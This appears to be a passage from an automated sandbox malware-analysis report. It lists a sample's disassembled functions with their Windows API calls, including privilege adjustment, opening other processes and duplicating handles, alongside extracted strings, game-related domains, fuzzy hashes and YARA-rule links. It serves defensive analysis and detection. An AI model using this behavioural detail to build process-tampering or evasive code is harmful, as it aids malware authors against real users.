                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 7880ce713861cedebdbb9582be3cf70d42a9d49c83ac9731ab9613d1614e04af
                                                                                  • Instruction ID: fa98cbb6a1b3253d10e74296ecce60b6868dc5eb376445655b003a7e9b10a906
                                                                                  • Opcode Fuzzy Hash: 7880ce713861cedebdbb9582be3cf70d42a9d49c83ac9731ab9613d1614e04af
                                                                                  • Instruction Fuzzy Hash: D71196B56083029FD740DF3DD985A0ABBE4EF89794F108A6DE988DB3A4D370D944CB52
                                                                                  Function 00408640 Relevance: 1.3, APIs: 1, Instructions: 14sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000001,000007D0), ref: 0040865D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 775f40985dda5b12ae45b1dd051a588b34f4d1a6a9f43efdd8e88aa6c1c871a2
                                                                                  • Instruction ID: 8cb7f5a38fb897feb26a5d9b144dddf35c5521c89a00febf70085c6762490ce9
                                                                                  • Opcode Fuzzy Hash: 775f40985dda5b12ae45b1dd051a588b34f4d1a6a9f43efdd8e88aa6c1c871a2
                                                                                  • Instruction Fuzzy Hash: 1EC01230648344C9E95021691B01B26329C0721788F02483BA989B17C0DDBFE8509AAF

                                                                                  Non-executed Functions

                                                                                  Function 6A6D3F40 Relevance: 90.2, APIs: 17, Strings: 34, Instructions: 982threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6D3DC0: _memset.LIBCMT ref: 6A6D3DE0
                                                                                  • _memset.LIBCMT ref: 6A6D3F92
                                                                                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 6A6D3FA4
                                                                                    • Part of subcall function 6A6EE09C: _malloc.LIBCMT ref: 6A6EE0BA
                                                                                    • Part of subcall function 6A6E8420: _malloc.LIBCMT ref: 6A6E8449
                                                                                    • Part of subcall function 6A6E8420: _memcpy_s.LIBCMT ref: 6A6E8455
                                                                                  • _memset.LIBCMT ref: 6A6D4699
                                                                                  • _sprintf.LIBCMT ref: 6A6D46B8
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D46CC
                                                                                  • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,?,6A732B2C,00000018,00000017,00000016,00000015,00000014,00000012), ref: 6A6D46E8
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C,?,?,?,?,?,?,?,?,6A732B2C,00000018,00000017,00000016,00000015,00000014,00000012), ref: 6A6D46EF
                                                                                  • GetTickCount.KERNEL32 ref: 6A6D4793
                                                                                  • _rand.LIBCMT ref: 6A6D47A2
                                                                                  • _malloc.LIBCMT ref: 6A6D4834
                                                                                  • GetTickCount.KERNEL32 ref: 6A6D4892
                                                                                  • _malloc.LIBCMT ref: 6A6D4905
                                                                                  • _malloc.LIBCMT ref: 6A6D4A8C
                                                                                  • InitializeCriticalSection.KERNEL32(6A72FC8C), ref: 6A6D4AF4
                                                                                  • CreateThread.KERNEL32(00000000,00000000,6A6D3D00,?,00000000,00000000), ref: 6A6D4B0C
                                                                                  • _malloc.LIBCMT ref: 6A6D4BE5
                                                                                  • _memset.LIBCMT ref: 6A6D4BFF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc$_memset$CountDebugOutputStringTick$CreateCriticalCurrentDirectoryInitializeSectionThread__wfopen_s_memcpy_s_rand_sprintf
                                                                                  • String ID: "$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$C:\pl.txt$H+sj$H+sj$InitShareData hWndExe is : 0x%0X, m_sAppPath is : %s$p+sj$p+sj$p+sj$p+sj$p+sj$p+sj$p+sj
                                                                                  • API String ID: 1641542171-3725503571
                                                                                  • Opcode ID: e5876064084adaa83d7fa34f930d76bb05222657ad9f3fb279786a6e7755ec10
                                                                                  • Instruction ID: 428e46781bd96c8e259a964d8cc128868037d6de9057e96a8dcb73194cb7c4b2
                                                                                  • Opcode Fuzzy Hash: e5876064084adaa83d7fa34f930d76bb05222657ad9f3fb279786a6e7755ec10
                                                                                  • Instruction Fuzzy Hash: 1A62E6B294A344A7E711AFB4994C79A65D07FD13C4F0B082CD9649B263FFF5CD0882A6
                                                                                  Function 6A6D6940 Relevance: 52.8, APIs: 8, Strings: 22, Instructions: 338fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,6A6DA369,?), ref: 6A6D696B
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,6A6DA369,?,?,?,?,00000000,00000103), ref: 6A6D698F
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,6A6DA369,?,?,?,?,00000000,00000103), ref: 6A6D69A0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                  • String ID: $!$$$1$3$5$6$AppleM2$Askm2com$D$HGEM2$Www.GameM2.Com$Www.MirGom.Com$]$`$a$c$h$l$n$www.applem2.com$www.xm2m2.com
                                                                                  • API String ID: 1378416451-1139999902
                                                                                  • Opcode ID: 025e63ec9474064447508273356b14e77d9f843a7dc1ea65570891e0fb3dc71c
                                                                                  • Instruction ID: c280eb3a8afa16cc5ef3c68c48df59aed9988c0cc4584c92f54e382afd461d83
                                                                                  • Opcode Fuzzy Hash: 025e63ec9474064447508273356b14e77d9f843a7dc1ea65570891e0fb3dc71c
                                                                                  • Instruction Fuzzy Hash: 98B15A7160C2404FE3009B3C9C597ABBBD59F8A368F480629F4958F292EF75DA0D8397
                                                                                  Function 0BEB739C Relevance: 48.5, APIs: 32, Instructions: 500windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetObjectA.GDI32(00000000,00000054,?), ref: 0BEB741C
                                                                                  • GetDC.USER32(00000000), ref: 0BEB742D
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0BEB743E
                                                                                  • CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 0BEB748A
                                                                                  • CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 0BEB74AE
                                                                                  • SelectObject.GDI32(?,?), ref: 0BEB770B
                                                                                  • SelectPalette.GDI32(?,00000000,00000000), ref: 0BEB774B
                                                                                  • RealizePalette.GDI32(?), ref: 0BEB7757
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0BEB77C0
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0BEB77DA
                                                                                  • SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,?,?,00000000,00000000,0BEB7968,?,00000000,0BEB798A), ref: 0BEB7822
                                                                                  • FillRect.USER32(?,?,00000000), ref: 0BEB77A8
                                                                                    • Part of subcall function 0BEB4240: GetSysColor.USER32(8B0BEB55), ref: 0BEB424A
                                                                                  • PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 0BEB7844
                                                                                  • CreateCompatibleDC.GDI32(00000028), ref: 0BEB7857
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0BEB787A
                                                                                  • SelectPalette.GDI32(?,00000000,00000000), ref: 0BEB7896
                                                                                  • RealizePalette.GDI32(?), ref: 0BEB78A1
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0BEB78BF
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0BEB78D9
                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0BEB7901
                                                                                  • SelectPalette.GDI32(?,00000000,000000FF), ref: 0BEB7913
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0BEB791D
                                                                                  • DeleteDC.GDI32(?), ref: 0BEB7938
                                                                                    • Part of subcall function 0BEB4F00: CreateBrushIndirect.GDI32(?), ref: 0BEB4FAA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
                                                                                  • String ID:
                                                                                  • API String ID: 1299887459-0
                                                                                  • Opcode ID: 3fbcbdff0bf8df4acfe6002550c97887027e15c360606154b36903f9037bec27
                                                                                  • Instruction ID: 30a3ced638870e887acd02d64f2228dc67d1cf0318926dbd2f27cdaaf578f3a3
                                                                                  • Opcode Fuzzy Hash: 3fbcbdff0bf8df4acfe6002550c97887027e15c360606154b36903f9037bec27
                                                                                  • Instruction Fuzzy Hash: B612E671A10208AFDB10EFA8C985FEEB7B8EB48314F119555F918EB691C774ED84CB60
                                                                                  Function 6A6DE3C0 Relevance: 47.4, APIs: 23, Strings: 4, Instructions: 183fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6DE421
                                                                                  • GetCurrentDirectoryA.KERNEL32(00000104,?,75923310,75920F00,00000000), ref: 6A6DE433
                                                                                  • _memset.LIBCMT ref: 6A6DE458
                                                                                  • GetLastError.KERNEL32 ref: 6A6DE460
                                                                                  • _sprintf.LIBCMT ref: 6A6DE474
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DE488
                                                                                  • OutputDebugStringA.KERNEL32(?), ref: 6A6DE49E
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DE4A5
                                                                                  • _memset.LIBCMT ref: 6A6DE4C9
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 6A6DE4D1
                                                                                  • OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 6A6DE50B
                                                                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,?), ref: 6A6DE521
                                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 6A6DE53B
                                                                                  • _memset.LIBCMT ref: 6A6DE546
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DE569
                                                                                  • OutputDebugStringA.KERNEL32(==============begin==============), ref: 6A6DE57C
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DE583
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DE5A1
                                                                                  • OutputDebugStringA.KERNEL32(?), ref: 6A6DE5B7
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DE5BE
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DE5DC
                                                                                  • OutputDebugStringA.KERNEL32(==============end==============), ref: 6A6DE5EF
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DE5F6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset$File$CurrentMapping$CreateDirectoryErrorLastOpenProcessView_sprintf
                                                                                  • String ID: ==============begin==============$==============end==============$C:\789.txt$GetCurDir failed (%d)
                                                                                  • API String ID: 2828095576-3745111052
                                                                                  • Opcode ID: c4e249f8fa677c6367f8e008860ebb550b1ee52240b2e1b1580abc46f5014893
                                                                                  • Instruction ID: eee09f2a78f4bbc273eecb61ec94aa09a161db1ed46e8e118ec4d53371c66b0a
                                                                                  • Opcode Fuzzy Hash: c4e249f8fa677c6367f8e008860ebb550b1ee52240b2e1b1580abc46f5014893
                                                                                  • Instruction Fuzzy Hash: 975192B1408344ABD310DBA4DD85DAFB7F9AB9A248F050D2DF64992241EF34AE088767
                                                                                  Function 0BE9622C Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144stringlibraryfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,0BE9AC64,?,0BEF80AC), ref: 0BE96249
                                                                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 0BE9625A
                                                                                  • lstrcpyn.KERNEL32(?,?,?,?,0BEF80AC), ref: 0BE9628E
                                                                                  • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,0BE9AC64,?,0BEF80AC), ref: 0BE962FF
                                                                                  • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll,0BE9AC64,?,0BEF80AC), ref: 0BE9633A
                                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,0BE9AC64,?,0BEF80AC), ref: 0BE9634D
                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,0BE9AC64,?,0BEF80AC), ref: 0BE9635A
                                                                                  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0BE9AC64,?,0BEF80AC), ref: 0BE96366
                                                                                  • lstrcpyn.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0BE9AC64), ref: 0BE9639A
                                                                                  • lstrlen.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0BE9AC64), ref: 0BE963A6
                                                                                  • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 0BE963CF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                  • API String ID: 3245196872-1565342463
                                                                                  • Opcode ID: d37d5e41c7418fa096f0618f9ae8ae31d759e7d00a5e7281d944eedf6e7f0b29
                                                                                  • Instruction ID: 53f423bf6ed6f67ecec44fcec354bced4d3e75250a453ba6d878646ffcd15d57
                                                                                  • Opcode Fuzzy Hash: d37d5e41c7418fa096f0618f9ae8ae31d759e7d00a5e7281d944eedf6e7f0b29
                                                                                  • Instruction Fuzzy Hash: D4514971D00229EFDF11DBE8DC85AEEB7B8AF48305F0415A2E015E7240D7749E48CBA5
                                                                                  Function 6A6DD8E0 Relevance: 21.2, APIs: 14, Instructions: 186nativememoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                  • ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                  • ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                  • ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                  • ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                  • ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                  • ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                  • ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • ZwOpenProcess.NTDLL(?,00000040,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA41
                                                                                  • ZwDuplicateObject.NTDLL(?,?,000000FF,?,001FFFFF,00000000,00000000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA63
                                                                                  • ZwQueryInformationProcess.NTDLL(00010000,00000000,?,00000018,00000000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA7B
                                                                                  • ZwDuplicateObject.NTDLL(?,?,000000FF,00010000,001FFFFF,00000000,00000000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDAB3
                                                                                  • ZwClose.NTDLL(?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDABE
                                                                                  • ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDADB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessVirtual$InformationOpenQuery$AllocateDuplicateFreeObjectSystem$AdjustClosePrivilege
                                                                                  • String ID:
                                                                                  • API String ID: 1854996211-0
                                                                                  • Opcode ID: a7080c8a29a511dc863db1d2f30086150afff212161d3e53916cbeb77f74a012
                                                                                  • Instruction ID: b66e8793ddd204e6f263d31d3aba01ba85fc161e5832f50f63a307362f76916a
                                                                                  • Opcode Fuzzy Hash: a7080c8a29a511dc863db1d2f30086150afff212161d3e53916cbeb77f74a012
                                                                                  • Instruction Fuzzy Hash: 2E6129B1108345AFD710DF95C884DABB7E8FB88754F048A2DF5A596290EB70EE44CF62
                                                                                  Function 6A6DB2B0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 126encryptionmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _printf.LIBCMT ref: 6A6DB312
                                                                                  • _printf.LIBCMT ref: 6A6DB325
                                                                                  • CertGetNameStringA.CRYPT32(00000000,00000004,00000001,00000000,00000000,00000000), ref: 6A6DB338
                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 6A6DB34B
